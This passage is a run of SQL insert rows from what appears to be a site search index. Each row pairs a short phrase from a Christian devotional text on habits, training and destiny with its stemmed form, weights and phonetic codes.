(173470, 'fall for the', 'fall for the', 0, 1, 1.4, 'F4163', 2, '*'),
(173471, 'father\'s heart 26', 'father heart 26', 0, 1, 1.5667, 'F36263', 3, '*'),
(173472, 'feel that', 'feel that', 0, 1, 1.3, 'F430', 2, '*'),
(173473, 'feel that the', 'feel that the', 0, 1, 1.4333, 'F430', 2, '*'),
(173474, 'feels', 'feel', 0, 0, 0.3333, 'F420', 2, '*'),
(173475, 'feels that', 'feel that', 0, 1, 1.3333, 'F423', 2, '*'),
(173476, 'feels that the', 'feel that the', 0, 1, 1.4667, 'F423', 2, '*'),
(173477, 'fester', 'fester', 0, 0, 0.4, 'F236', 2, '*'),
(173478, 'fester in', 'fester in', 0, 1, 1.3, 'F2365', 2, '*'),
(173479, 'fester in your', 'fester in your', 0, 1, 1.4667, 'F23656', 2, '*'),
(173480, 'fighter', 'fighter', 0, 0, 0.4667, 'F236', 2, '*'),
(173481, 'fighter and', 'fighter and', 0, 1, 1.3667, 'F23653', 2, '*'),
(173482, 'fighter and is', 'fighter and is', 0, 1, 1.4667, 'F236532', 2, '*'),
(173483, 'find it', 'find it', 0, 1, 1.2333, 'F530', 4, '*'),
(173484, 'find it difficult', 'find it difficult', 0, 1, 1.5667, 'F531243', 4, '*'),
(173485, 'for how', 'for how', 0, 1, 1.2333, 'F600', 2, '*'),
(173486, 'for how to', 'for how to', 0, 1, 1.3333, 'F630', 2, '*'),
(173487, 'for the demonic', 'for the demonic', 0, 1, 1.5, 'F6352', 2, '*'),
(173488, 'for twenty', 'for twenty', 0, 1, 1.3333, 'F6353', 2, '*'),
(173489, 'for twenty one', 'for twenty one', 0, 1, 1.4667, 'F63535', 2, '*'),
(173490, 'for you don\'t', 'for you don', 0, 1, 1.4333, 'F6353', 2, '*'),
(173491, 'for your seemly', 'for your seemly', 0, 1, 1.5, 'F6254', 2, '*'),
(173492, 'from training', 'from training', 0, 1, 1.4333, 'F653652', 2, '*'),
(173493, 'from training and', 'from training and', 0, 1, 1.5667, 'F65365253', 2, '*'),
(173494, 'fronts', 'front', 0, 0, 0.4, 'F6532', 2, '*'),
(173497, 'function in', 'function in', 0, 1, 1.3667, 'F5235', 2, '*'),
(173498, 'function in your', 'function in your', 0, 1, 1.5333, 'F52356', 2, '*'),
(173499, 'future in god', 'futur in god', 0, 1, 1.4333, 'F36523', 3, '*'),
(173500, 'get the', 'get the', 0, 1, 1.2333, 'G300', 6, '*'),
(173501, 'get the most', 'get the most', 0, 1, 1.4, 'G3523', 3, '*'),
(173502, 'god do', 'god do', 0, 1, 1.2, 'G300', 3, '*'),
(173503, 'god do not', 'god do not', 0, 1, 1.3333, 'G353', 2, '*'),
(173504, 'god hanging', 'god hanging', 0, 1, 1.3667, 'G35252', 2, '*'),
(173505, 'god hanging on', 'god hanging on', 0, 1, 1.4667, 'G352525', 2, '*'),
(173506, 'god has preserved', 'god has preserved', 0, 1, 1.5667, 'G32162613', 2, '*'),
(173507, 'god let', 'god let', 0, 1, 1.2333, 'G343', 2, '*'),
(173508, 'god let your', 'god let your', 0, 1, 1.4, 'G3436', 2, '*'),
(173509, 'god may you', 'god may you', 0, 1, 1.3667, 'G350', 2, '*'),
(173510, 'going through however', 'go through however', 0, 1, 1.7, 'G5236216', 2, '*'),
(173511, 'great future', 'great future', 0, 1, 1.4, 'G63136', 2, '*'),
(173512, 'great future that', 'great future that', 0, 1, 1.5667, 'G631363', 2, '*'),
(173513, 'grow and', 'grow and', 0, 1, 1.2667, 'G653', 2, '*'),
(173514, 'grow and fester', 'grow and fester', 0, 1, 1.5, 'G6531236', 2, '*'),
(173515, 'grow out', 'grow out', 0, 1, 1.2667, 'G630', 2, '*'),
(173516, 'grow out of', 'grow out of', 0, 1, 1.3667, 'G631', 2, '*'),
(173517, 'habit adopt', 'habit adopt', 0, 1, 1.3667, 'H1313', 2, '*'),
(173518, 'habit adopt the', 'habit adopt the', 0, 1, 1.5, 'H1313', 2, '*'),
(173519, 'habit anything', 'habit anything', 0, 1, 1.4667, 'H135352', 2, '*'),
(173520, 'habit anything you', 'habit anything you', 0, 1, 1.6, 'H135352', 2, '*'),
(173521, 'habits and', 'habit and', 0, 1, 1.3333, 'H13253', 2, '*'),
(173522, 'habits and let', 'habit and let', 0, 1, 1.4667, 'H1325343', 2, '*'),
(173523, 'habits are', 'habit are', 0, 1, 1.3333, 'H1326', 2, '*'),
(173524, 'habits are vehicles', 'habit are vehicles', 0, 1, 1.6333, 'H13261242', 2, '*'),
(173525, 'habits are you', 'habit are you', 0, 1, 1.4667, 'H1326', 2, '*'),
(173526, 'habits because', 'habit because', 0, 1, 1.4667, 'H13212', 2, '*'),
(173527, 'habits because demonic', 'habit because demonic', 0, 1, 1.7333, 'H13212352', 2, '*'),
(173528, 'habits break', 'habit break', 0, 1, 1.4, 'H132162', 2, '*'),
(173529, 'habits break bad', 'habit break bad', 0, 1, 1.5333, 'H13216213', 2, '*'),
(173530, 'habits hence', 'habit hence', 0, 1, 1.4, 'H13252', 2, '*'),
(173531, 'habits hence robbing', 'habit hence robbing', 0, 1, 1.6667, 'H132526152', 2, '*'),
(173532, 'habits the', 'habit the', 0, 1, 1.3333, 'H1323', 2, '*'),
(173533, 'habits the all-night', 'habit the all-night', 0, 1, 1.6667, 'H13234523', 2, '*'),
(173534, 'habits what', 'habit what', 0, 1, 1.3667, 'H1323', 2, '*'),
(173535, 'habits what habits', 'habit what habits', 0, 1, 1.6, 'H1323132', 2, '*'),
(173536, 'habits you', 'habit you', 0, 1, 1.3333, 'H132', 2, '*'),
(173537, 'habits you allow', 'habit you allow', 0, 1, 1.5333, 'H1324', 2, '*'),
(173538, 'habits you do', 'habit you do', 0, 1, 1.4333, 'H1323', 2, '*'),
(173539, 'hand into', 'hand into', 0, 1, 1.3, 'H5353', 2, '*'),
(173540, 'hand into strange', 'hand into strange', 0, 1, 1.5667, 'H535323652', 2, '*'),
(173541, 'hanging on', 'hang on', 0, 1, 1.3333, 'H52525', 2, '*'),
(173542, 'hanging on your', 'hang on your', 0, 1, 1.5, 'H525256', 2, '*'),
(173543, 'has preserved', 'ha preserved', 0, 1, 1.4333, 'H2162613', 2, '*'),
(173544, 'has preserved for', 'ha preserved for', 0, 1, 1.5667, 'H216261316', 2, '*'),
(173545, 'have always', 'have always', 0, 1, 1.3667, 'H142', 3, '*'),
(173546, 'have always told', 'have always told', 0, 1, 1.5333, 'H142343', 2, '*'),
(173547, 'heart 26', 'heart 26', 0, 1, 1.2667, 'H630', 3, '*'),
(173549, 'help you because', 'help you because', 0, 1, 1.5333, 'H412', 2, '*'),
(173550, 'hence robbing', 'henc robbing', 0, 1, 1.4333, 'H526152', 2, '*'),
(173551, 'hence robbing you', 'henc robbing you', 0, 1, 1.5667, 'H526152', 2, '*'),
(173552, 'holy spirit help', 'holi spirit help', 0, 1, 1.5333, 'H4216341', 3, '*'),
(173553, 'house is', 'hous is', 0, 1, 1.2667, 'H200', 2, '*'),
(173554, 'house is to', 'hous is to', 0, 1, 1.3667, 'H230', 2, '*'),
(173555, 'how effective', 'how effective', 0, 1, 1.4333, 'H1231', 2, '*'),
(173556, 'how effective and', 'how effective and', 0, 1, 1.5667, 'H123153', 2, '*'),
(173557, 'how to make', 'how to make', 0, 1, 1.3667, 'H352', 2, '*'),
(173558, 'however the strength', 'howev the strength', 0, 1, 1.6667, 'H163236523', 2, '*'),
(173559, 'i have always', 'i have always', 0, 1, 1.4333, 'I142', 2, '*'),
(173560, 'in destiny', 'in destiny', 0, 1, 1.3333, 'I53235', 2, '*'),
(173561, 'in destiny break', 'in destiny break', 0, 1, 1.5333, 'I53235162', 2, '*'),
(173562, 'in god do', 'in god do', 0, 1, 1.3, 'I523', 2, '*'),
(173563, 'in god may', 'in god may', 0, 1, 1.3333, 'I5235', 2, '*'),
(173564, 'in so doing', 'in so doing', 0, 1, 1.3667, 'I52352', 2, '*'),
(173565, 'in the dream', 'in the dream', 0, 1, 1.4, 'I5365', 6, '*'),
(173566, 'in the terrain', 'in the terrain', 0, 1, 1.4667, 'I5365', 2, '*'),
(173567, 'in your destiny', 'in your destiny', 0, 1, 1.5, 'I563235', 2, '*'),
(173568, 'increased', 'increas', 0, 0, 0.6, 'I52623', 2, '*'),
(173569, 'increased capacity', 'increas capacity', 0, 1, 1.6, 'I526232123', 2, '*'),
(173570, 'increased capacity in', 'increas capacity in', 0, 1, 1.7, 'I5262321235', 2, '*'),
(173571, 'intently', 'intent', 0, 0, 0.5333, 'I53534', 2, '*'),
(173572, 'intently to', 'intent to', 0, 1, 1.3667, 'I535343', 2, '*'),
(173573, 'intently to sound', 'intent to sound', 0, 1, 1.5667, 'I535343253', 2, '*'),
(173574, 'into habit', 'into habit', 0, 1, 1.3333, 'I5313', 2, '*'),
(173575, 'into habit anything', 'into habit anything', 0, 1, 1.6333, 'I53135352', 2, '*'),
(173576, 'into habits', 'into habits', 0, 1, 1.3667, 'I53132', 2, '*'),
(173577, 'into habits break', 'into habits break', 0, 1, 1.5667, 'I53132162', 2, '*'),
(173578, 'into strange', 'into strange', 0, 1, 1.4, 'I5323652', 2, '*'),
(173579, 'into strange sins', 'into strange sins', 0, 1, 1.5667, 'I532365252', 2, '*'),
(173580, 'is a smart', 'is a smart', 0, 1, 1.3333, 'I2563', 2, '*'),
(173581, 'is aimed', 'is aimed', 0, 1, 1.2667, 'I253', 2, '*'),
(173582, 'is aimed at', 'is aimed at', 0, 1, 1.3667, 'I253', 2, '*'),
(173583, 'is beautiful', 'is beautiful', 0, 1, 1.4, 'I21314', 2, '*'),
(173584, 'is beautiful to', 'is beautiful to', 0, 1, 1.5, 'I213143', 2, '*'),
(173585, 'is because of', 'is because of', 0, 1, 1.4333, 'I2121', 2, '*'),
(173586, 'is being demanded', 'is being demanded', 0, 1, 1.5667, 'I2152353', 2, '*'),
(173587, 'is not just', 'is not just', 0, 1, 1.3667, 'I25323', 5, '*'),
(173588, 'is supplied', 'is supplied', 0, 1, 1.3667, 'I2143', 4, '*'),
(173589, 'is supplied in', 'is supplied in', 0, 1, 1.4667, 'I21435', 2, '*'),
(173590, 'is supposed', 'is supposed', 0, 1, 1.3667, 'I2123', 2, '*'),
(173591, 'is supposed to', 'is supposed to', 0, 1, 1.4667, 'I2123', 2, '*'),
(173592, 'is to translate', 'is to translate', 0, 1, 1.5, 'I2365243', 2, '*'),
(173593, 'is training', 'is training', 0, 1, 1.3667, 'I23652', 2, '*'),
(173595, 'it adds', 'it adds', 0, 1, 1.2333, 'I320', 2, '*'),
(173596, 'it adds to', 'it adds to', 0, 1, 1.3333, 'I323', 2, '*'),
(173597, 'it be part', 'it be part', 0, 1, 1.3333, 'I3163', 2, '*'),
(173598, 'it difficult', 'it difficult', 0, 1, 1.4, 'I31243', 4, '*'),
(173599, 'it difficult to', 'it difficult to', 0, 1, 1.5, 'I31243', 4, '*'),
(173602, 'journey your', 'journei your', 0, 1, 1.4, 'J656', 2, '*'),
(173603, 'journey your habits', 'journei your habits', 0, 1, 1.6333, 'J656132', 2, '*'),
(173604, 'just a church', 'just a church', 0, 1, 1.4333, 'J3262', 2, '*'),
(173606, 'later when', 'later when', 0, 1, 1.3333, 'L365', 2, '*'),
(173607, 'later when the', 'later when the', 0, 1, 1.4667, 'L3653', 2, '*'),
(173608, 'learner', 'learner', 0, 0, 0.4667, 'L656', 2, '*'),
(173609, 'learner and', 'learner and', 0, 1, 1.3667, 'L65653', 2, '*'),
(173610, 'learner and take', 'learner and take', 0, 1, 1.5333, 'L656532', 2, '*'),
(173611, 'let your training', 'let your training', 0, 1, 1.5667, 'L363652', 2, '*'),
(173612, 'lie of', 'lie of', 0, 1, 1.2, 'L100', 2, '*'),
(173613, 'lie of the', 'lie of the', 0, 1, 1.3333, 'L130', 2, '*'),
(173614, 'life and destiny', 'life and destiny', 0, 1, 1.5333, 'L153235', 7, '*'),
(173615, 'life and is', 'life and is', 0, 1, 1.3667, 'L1532', 2, '*'),
(173616, 'life and you', 'life and you', 0, 1, 1.4, 'L153', 5, '*'),
(173617, 'life in', 'life in', 0, 1, 1.2333, 'L150', 2, '*'),
(173618, 'life in so', 'life in so', 0, 1, 1.3333, 'L152', 2, '*'),
(173619, 'life is beautiful', 'life is beautiful', 0, 1, 1.5667, 'L121314', 2, '*'),
(173620, 'life style', 'life style', 0, 1, 1.3333, 'L1234', 2, '*'),
(173621, 'life style the', 'life style the', 0, 1, 1.4667, 'L12343', 2, '*'),
(173622, 'life the', 'life the', 0, 1, 1.2667, 'L130', 7, '*'),
(173623, 'life the habits', 'life the habits', 0, 1, 1.5, 'L13132', 2, '*'),
(173624, 'life will determine', 'life will determine', 0, 1, 1.6333, 'L14365', 2, '*'),
(173625, 'limit how', 'limit how', 0, 1, 1.3, 'L530', 2, '*'),
(173626, 'limit how effective', 'limit how effective', 0, 1, 1.6333, 'L531231', 2, '*'),
(173627, 'listen actively', 'listen actively', 0, 1, 1.5, 'L2352314', 2, '*'),
(173628, 'listen actively and', 'listen actively and', 0, 1, 1.6333, 'L235231453', 2, '*'),
(173629, 'looking for how', 'look for how', 0, 1, 1.5, 'L25216', 2, '*'),
(173630, 'lord has told', 'lord has told', 0, 1, 1.4333, 'L632343', 2, '*'),
(173631, 'make you feel', 'make you feel', 0, 1, 1.4333, 'M214', 2, '*'),
(173632, 'make you unfit', 'make you unfit', 0, 1, 1.4667, 'M2513', 2, '*'),
(173633, 'makes you feels', 'make you feels', 0, 1, 1.5, 'M2142', 2, '*'),
(173634, 'might not', 'might not', 0, 1, 1.3, 'M2353', 2, '*'),
(173635, 'might not be', 'might not be', 0, 1, 1.4, 'M23531', 2, '*'),
(173636, 'most of your', 'most of your', 0, 1, 1.4, 'M2316', 2, '*'),
(173637, 'much for', 'much for', 0, 1, 1.2667, 'M216', 2, '*'),
(173638, 'much for you', 'much for you', 0, 1, 1.4, 'M216', 2, '*'),
(173639, 'much remember', 'much remember', 0, 1, 1.4333, 'M26516', 2, '*'),
(173640, 'much remember that', 'much remember that', 0, 1, 1.6, 'M265163', 2, '*'),
(173641, 'must translate', 'must translate', 0, 1, 1.4667, 'M2365243', 2, '*'),
(173642, 'must translate training', 'must translate training', 0, 1, 1.7667, 'M2365243652', 2, '*'),
(173643, 'negative habits', 'neg habits', 0, 1, 1.5, 'N23132', 2, '*'),
(173644, 'negative habits and', 'neg habits and', 0, 1, 1.6333, 'N2313253', 2, '*'),
(173645, 'negative habits because', 'neg habits because', 0, 1, 1.7667, 'N2313212', 2, '*'),
(173646, 'negative habits hence', 'neg habits hence', 0, 1, 1.7, 'N2313252', 2, '*'),
(173647, 'negative habits you', 'neg habits you', 0, 1, 1.6333, 'N23132', 2, '*'),
(173648, 'not be sweet', 'not be sweet', 0, 1, 1.4, 'N3123', 2, '*'),
(173649, 'not check', 'not check', 0, 1, 1.3, 'N320', 2, '*'),
(173650, 'not check and', 'not check and', 0, 1, 1.4333, 'N3253', 2, '*'),
(173651, 'not fall', 'not fall', 0, 1, 1.2667, 'N314', 2, '*'),
(173652, 'not fall for', 'not fall for', 0, 1, 1.4, 'N31416', 2, '*'),
(173653, 'not just', 'not just', 0, 1, 1.2667, 'N323', 6, '*'),
(173654, 'not just a', 'not just a', 0, 1, 1.3333, 'N323', 2, '*'),
(173655, 'not waste', 'not waste', 0, 1, 1.3, 'N323', 2, '*'),
(173656, 'not waste divine', 'not waste divine', 0, 1, 1.5333, 'N32315', 2, '*'),
(173657, 'now will', 'now will', 0, 1, 1.2667, 'N400', 2, '*'),
(173658, 'now will grow', 'now will grow', 0, 1, 1.4333, 'N426', 2, '*'),
(173659, 'of god hanging', 'of god hanging', 0, 1, 1.4667, 'O1235252', 2, '*'),
(173660, 'of god let', 'of god let', 0, 1, 1.3333, 'O12343', 2, '*'),
(173661, 'of hand', 'of hand', 0, 1, 1.2333, 'O153', 2, '*'),
(173662, 'of hand into', 'of hand into', 0, 1, 1.4, 'O15353', 2, '*'),
(173663, 'of the destiny', 'of the destiny', 0, 1, 1.4667, 'O13235', 2, '*'),
(173664, 'of them and', 'of them and', 0, 1, 1.3667, 'O1353', 2, '*'),
(173665, 'of training', 'of training', 0, 1, 1.3667, 'O13652', 5, '*'),
(173666, 'of training are', 'of training are', 0, 1, 1.5, 'O136526', 2, '*'),
(173667, 'of training is', 'of training is', 0, 1, 1.4667, 'O13652', 2, '*'),
(173668, 'of training only', 'of training only', 0, 1, 1.5333, 'O1365254', 2, '*'),
(173669, 'of your daily', 'of your daily', 0, 1, 1.4333, 'O1634', 2, '*'),
(173670, 'of your destiny', 'of your destiny', 0, 1, 1.5, 'O163235', 7, '*'),
(173671, 'of your future', 'of your future', 0, 1, 1.4667, 'O16136', 2, '*'),
(173672, 'of your purpose', 'of your purpose', 0, 1, 1.5, 'O161612', 2, '*'),
(173673, 'one days', 'on days', 0, 1, 1.2667, 'O532', 2, '*'),
(173674, 'one days becomes', 'on days becomes', 0, 1, 1.5333, 'O5321252', 2, '*'),
(173675, 'only to', 'onli to', 0, 1, 1.2333, 'O543', 2, '*'),
(173676, 'only to regret', 'onli to regret', 0, 1, 1.4667, 'O5436263', 2, '*'),
(173677, 'out of hand', 'out of hand', 0, 1, 1.3667, 'O3153', 2, '*'),
(173678, 'peak', 'peak', 0, 0, 0.2667, 'P200', 2, '*'),
(173679, 'peak too', 'peak too', 0, 1, 1.2667, 'P230', 2, '*'),
(173680, 'peak too soon', 'peak too soon', 0, 1, 1.4333, 'P2325', 2, '*'),
(173681, 'people who make', 'peopl who make', 0, 1, 1.5, 'P452', 2, '*'),
(173682, 'people who try', 'peopl who try', 0, 1, 1.4667, 'P436', 2, '*'),
(173683, 'place of training', 'place of training', 0, 1, 1.5667, 'P4213652', 2, '*'),
(173684, 'place of your', 'place of your', 0, 1, 1.4333, 'P4216', 3, '*'),
(173685, 'positive habits', 'posit habits', 0, 1, 1.5, 'P23132', 2, '*'),
(173686, 'positive habits and', 'posit habits and', 0, 1, 1.6333, 'P2313253', 2, '*'),
(173687, 'powerless', 'powerless', 0, 0, 0.6, 'P642', 2, '*'),
(173688, 'powerless when', 'powerless when', 0, 1, 1.4667, 'P6425', 2, '*'),
(173689, 'powerless when you', 'powerless when you', 0, 1, 1.6, 'P6425', 2, '*'),
(173690, 'prayer programs', 'prayer programs', 0, 1, 1.5, 'P6162652', 2, '*'),
(173691, 'prayer programs and', 'prayer programs and', 0, 1, 1.6333, 'P616265253', 2, '*'),
(173692, 'preparation till', 'prepar till', 0, 1, 1.5333, 'P6163534', 2, '*'),
(173693, 'preparation till next', 'prepar till next', 0, 1, 1.7, 'P6163534523', 2, '*'),
(173694, 'preserved', 'preserv', 0, 0, 0.6, 'P62613', 2, '*'),
(173695, 'preserved for', 'preserv for', 0, 1, 1.4333, 'P6261316', 2, '*'),
(173696, 'preserved for you', 'preserv for you', 0, 1, 1.5667, 'P6261316', 2, '*'),
(173699, 'programs', 'program', 0, 0, 0.5333, 'P62652', 2, '*'),
(173700, 'programs and', 'program and', 0, 1, 1.4, 'P6265253', 2, '*'),
(173701, 'programs and schedule', 'program and schedule', 0, 1, 1.7, 'P6265253234', 2, '*'),
(173702, 'purpose in', 'purpos in', 0, 1, 1.3333, 'P6125', 4, '*'),
(173703, 'purpose in god', 'purpos in god', 0, 1, 1.4667, 'P612523', 2, '*'),
(173704, 'reason for', 'reason for', 0, 1, 1.3333, 'R2516', 2, '*'),
(173705, 'reason for your', 'reason for your', 0, 1, 1.5, 'R2516', 2, '*'),
(173706, 'regret', 'regret', 0, 0, 0.4, 'R263', 3, '*'),
(173707, 'regret later', 'regret later', 0, 1, 1.4, 'R263436', 2, '*'),
(173708, 'regret later when', 'regret later when', 0, 1, 1.5667, 'R2634365', 2, '*'),
(173709, 'relevant', 'relev', 0, 0, 0.5333, 'R4153', 2, '*'),
(173710, 'relevant you', 'relev you', 0, 1, 1.4, 'R4153', 2, '*'),
(173711, 'relevant you will', 'relev you will', 0, 1, 1.5667, 'R41534', 2, '*'),
(173712, 'remember that training', 'rememb that training', 0, 1, 1.7333, 'R5163652', 2, '*'),
(173713, 'robbing', 'rob', 0, 0, 0.4667, 'R152', 2, '*'),
(173714, 'robbing you', 'rob you', 0, 1, 1.3667, 'R152', 2, '*'),
(173715, 'robbing you of', 'rob you of', 0, 1, 1.4667, 'R1521', 2, '*'),
(173716, 's heart 26', 's heart 26', 0, 1, 1.3333, 'S630', 3, '*'),
(173717, 'schedule', 'schedul', 0, 0, 0.5333, 'S340', 3, '*'),
(173718, 'schedule the', 'schedul the', 0, 1, 1.4, 'S343', 2, '*'),
(173719, 'schedule the ability', 'schedul the ability', 0, 1, 1.6667, 'S343143', 2, '*'),
(173720, 'securing', 'secur', 0, 0, 0.5333, 'S652', 2, '*'),
(173721, 'securing the', 'secur the', 0, 1, 1.4, 'S6523', 2, '*'),
(173722, 'securing the great', 'secur the great', 0, 1, 1.6, 'S6523263', 2, '*'),
(173723, 'seemly', 'seemli', 0, 0, 0.4, 'S540', 2, '*'),
(173724, 'seemly tough', 'seemli tough', 0, 1, 1.4, 'S5432', 2, '*'),
(173725, 'seemly tough training', 'seemli tough training', 0, 1, 1.7, 'S54323652', 2, '*'),
(173726, 'serious the', 'seriou the', 0, 1, 1.3667, 'S623', 2, '*'),
(173727, 'serious the best', 'seriou the best', 0, 1, 1.5333, 'S623123', 2, '*'),
(173728, 'sins that', 'sin that', 0, 1, 1.3, 'S523', 2, '*'),
(173729, 'sins that will', 'sin that will', 0, 1, 1.4667, 'S5234', 2, '*'),
(173730, 'sit', 'sit', 0, 0, 0.2, 'S300', 2, '*'),
(173731, 'sit down', 'sit down', 0, 1, 1.2667, 'S350', 2, '*'),
(173732, 'sit down and', 'sit down and', 0, 1, 1.4, 'S353', 2, '*'),
(173733, 'smart', 'smart', 0, 0, 0.3333, 'S563', 2, '*'),
(173734, 'smart fighter', 'smart fighter', 0, 1, 1.4333, 'S5631236', 2, '*'),
(173735, 'smart fighter and', 'smart fighter and', 0, 1, 1.5667, 'S563123653', 2, '*'),
(173736, 'soon avoid', 'soon avoid', 0, 1, 1.3333, 'S513', 2, '*'),
(173737, 'soon avoid people', 'soon avoid people', 0, 1, 1.5667, 'S51314', 2, '*'),
(173738, 'sound', 'sound', 0, 0, 0.3333, 'S530', 4, '*'),
(173739, 'sound teaching', 'sound teaching', 0, 1, 1.4667, 'S53252', 2, '*'),
(173740, 'sound teaching is', 'sound teaching is', 0, 1, 1.5667, 'S53252', 2, '*'),
(173741, 'spirit help', 'spirit help', 0, 1, 1.3667, 'S16341', 3, '*'),
(173742, 'spirit help you', 'spirit help you', 0, 1, 1.5, 'S16341', 3, '*'),
(173743, 'start to', 'start to', 0, 1, 1.2667, 'S363', 3, '*'),
(173744, 'start to function', 'start to function', 0, 1, 1.5667, 'S36315235', 2, '*'),
(173745, 'strange sins', 'strang sins', 0, 1, 1.4, 'S365252', 2, '*'),
(173746, 'strange sins that', 'strang sins that', 0, 1, 1.5667, 'S3652523', 2, '*'),
(173747, 'strength character', 'strength character', 0, 1, 1.6, 'S3652326236', 2, '*'),
(173748, 'strength character and', 'strength character and', 0, 1, 1.7333, 'S365232623653', 2, '*'),
(173749, 'style the', 'style the', 0, 1, 1.3, 'S343', 3, '*'),
(173750, 'style the reason', 'style the reason', 0, 1, 1.5333, 'S343625', 2, '*'),
(173751, 'substance', 'substanc', 0, 0, 0.6, 'S12352', 5, '*'),
(173752, 'substance that', 'substanc that', 0, 1, 1.4667, 'S123523', 2, '*'),
(173753, 'substance that is', 'substanc that is', 0, 1, 1.5667, 'S1235232', 2, '*'),
(173754, 'supplied', 'suppli', 0, 0, 0.5333, 'S143', 4, '*'),
(173755, 'supplied in', 'suppli in', 0, 1, 1.3667, 'S1435', 2, '*'),
(173756, 'supplied in the', 'suppli in the', 0, 1, 1.5, 'S14353', 2, '*'),
(173757, 'supposed', 'suppos', 0, 0, 0.5333, 'S123', 2, '*'),
(173758, 'supposed to', 'suppos to', 0, 1, 1.3667, 'S123', 2, '*'),
(173759, 'supposed to become', 'suppos to become', 0, 1, 1.6, 'S123125', 2, '*'),
(173760, 'sweet', 'sweet', 0, 0, 0.3333, 'S300', 3, '*'),
(173761, 'sweet when', 'sweet when', 0, 1, 1.3333, 'S350', 2, '*'),
(173762, 'sweet when you', 'sweet when you', 0, 1, 1.4667, 'S350', 2, '*'),
(173763, 'take training', 'take training', 0, 1, 1.4333, 'T23652', 2, '*'),
(173764, 'take training serious', 'take training serious', 0, 1, 1.7, 'T2365262', 2, '*'),
(173765, 'teaching is', 'teach is', 0, 1, 1.3667, 'T252', 2, '*'),
(173766, 'teaching is aimed', 'teach is aimed', 0, 1, 1.5667, 'T25253', 2, '*'),
(173767, 'terrain', 'terrain', 0, 0, 0.4667, 'T650', 2, '*'),
(173768, 'terrain of', 'terrain of', 0, 1, 1.3333, 'T651', 2, '*'),
(173769, 'terrain of your', 'terrain of your', 0, 1, 1.5, 'T6516', 2, '*'),
(173770, 'that determine', 'that determine', 0, 1, 1.4667, 'T650', 2, '*'),
(173771, 'that determine where', 'that determine where', 0, 1, 1.6667, 'T656', 2, '*'),
(173772, 'that is supplied', 'that is supplied', 0, 1, 1.5333, 'T2143', 2, '*'),
(173773, 'that the demands', 'that the demands', 0, 1, 1.5333, 'T532', 2, '*'),
(173774, 'that the dream', 'that the dream', 0, 1, 1.4667, 'T650', 2, '*'),
(173775, 'that training', 'that training', 0, 1, 1.4333, 'T652', 2, '*'),
(173776, 'that training might', 'that training might', 0, 1, 1.6333, 'T652523', 2, '*'),
(173777, 'that will limit', 'that will limit', 0, 1, 1.5, 'T453', 2, '*'),
(173778, 'the ability to', 'the ability to', 0, 1, 1.4667, 'T143', 4, '*'),
(173779, 'the all-night', 'the all-night', 0, 1, 1.4333, 'T4523', 2, '*'),
(173780, 'the all-night trainings', 'the all-night trainings', 0, 1, 1.7667, 'T4523652', 2, '*'),
(173781, 'the bad', 'the bad', 0, 1, 1.2333, 'T130', 2, '*'),
(173782, 'the bad and', 'the bad and', 0, 1, 1.3667, 'T1353', 2, '*'),
(173783, 'the demands', 'the demands', 0, 1, 1.3667, 'T532', 2, '*'),
(173784, 'the demands are', 'the demands are', 0, 1, 1.5, 'T5326', 2, '*'),
(173785, 'the demands of', 'the demands of', 0, 1, 1.4667, 'T5321', 2, '*'),
(173786, 'the demonic', 'the demonic', 0, 1, 1.3667, 'T520', 2, '*'),
(173787, 'the demonic lie', 'the demonic lie', 0, 1, 1.5, 'T524', 2, '*'),
(173788, 'the destiny', 'the destiny', 0, 1, 1.3667, 'T235', 2, '*'),
(173789, 'the destiny and', 'the destiny and', 0, 1, 1.5, 'T2353', 2, '*'),
(173790, 'the devil that', 'the devil that', 0, 1, 1.4667, 'T143', 3, '*'),
(173791, 'the great future', 'the great future', 0, 1, 1.5333, 'T263136', 2, '*'),
(173792, 'the habits', 'the habits', 0, 1, 1.3333, 'T132', 2, '*'),
(173793, 'the habits you', 'the habits you', 0, 1, 1.4667, 'T132', 2, '*'),
(173794, 'the house is', 'the house is', 0, 1, 1.4, 'T200', 2, '*'),
(173795, 'the most of', 'the most of', 0, 1, 1.3667, 'T5231', 3, '*'),
(173796, 'the positive', 'the positive', 0, 1, 1.4, 'T1231', 2, '*'),
(173797, 'the positive habits', 'the positive habits', 0, 1, 1.6333, 'T123132', 2, '*'),
(173798, 'the prayer', 'the prayer', 0, 1, 1.3333, 'T160', 2, '*'),
(173799, 'the prayer programs', 'the prayer programs', 0, 1, 1.6333, 'T16162652', 2, '*'),
(173800, 'the reason', 'the reason', 0, 1, 1.3333, 'T625', 5, '*'),
(173801, 'the reason for', 'the reason for', 0, 1, 1.4667, 'T62516', 2, '*'),
(173802, 'the strength', 'the strength', 0, 1, 1.4, 'T236523', 4, '*'),
(173803, 'the strength character', 'the strength character', 0, 1, 1.7333, 'T23652326236', 2, '*'),
(173804, 'the substance', 'the substance', 0, 1, 1.4333, 'T212352', 3, '*'),
(173805, 'the substance that', 'the substance that', 0, 1, 1.6, 'T2123523', 2, '*'),
(173806, 'the terrain', 'the terrain', 0, 1, 1.3667, 'T650', 2, '*'),
(173807, 'the terrain of', 'the terrain of', 0, 1, 1.4667, 'T651', 2, '*'),
(173808, 'them and they', 'them and they', 0, 1, 1.4333, 'T530', 2, '*'),
(173809, 'there are people', 'there are people', 0, 1, 1.5333, 'T614', 3, '*'),
(173810, 'therefore you', 'therefor you', 0, 1, 1.4333, 'T616', 2, '*'),
(173811, 'therefore you must', 'therefor you must', 0, 1, 1.6, 'T616523', 2, '*'),
(173812, 'they find it', 'thei find it', 0, 1, 1.4, 'T153', 4, '*'),
(173813, 'through however', 'through however', 0, 1, 1.5, 'T6216', 2, '*'),
(173814, 'through however the', 'through however the', 0, 1, 1.6333, 'T62163', 2, '*'),
(173815, 'through unbroken', 'through unbroken', 0, 1, 1.5333, 'T6251625', 1, '*'),
(173816, 'through unbroken negative', 'through unbroken negative', 0, 1, 1.8333, 'T6251625231', 1, '*'),
(173817, 'to be careless', 'to be careless', 0, 1, 1.4667, 'T12642', 3, '*'),
(173818, 'to become a', 'to become a', 0, 1, 1.3667, 'T125', 3, '*'),
(173819, 'to behold', 'to behold', 0, 1, 1.3, 'T143', 2, '*'),
(173820, 'to behold when', 'to behold when', 0, 1, 1.4667, 'T1435', 2, '*'),
(173821, 'to escape', 'to escape', 0, 1, 1.3, 'T210', 3, '*'),
(173822, 'to escape from', 'to escape from', 0, 1, 1.4667, 'T2165', 2, '*'),
(173823, 'to function in', 'to function in', 0, 1, 1.4667, 'T15235', 2, '*'),
(173824, 'to get the', 'to get the', 0, 1, 1.3333, 'T230', 3, '*'),
(173825, 'to grow and', 'to grow and', 0, 1, 1.3667, 'T2653', 2, '*'),
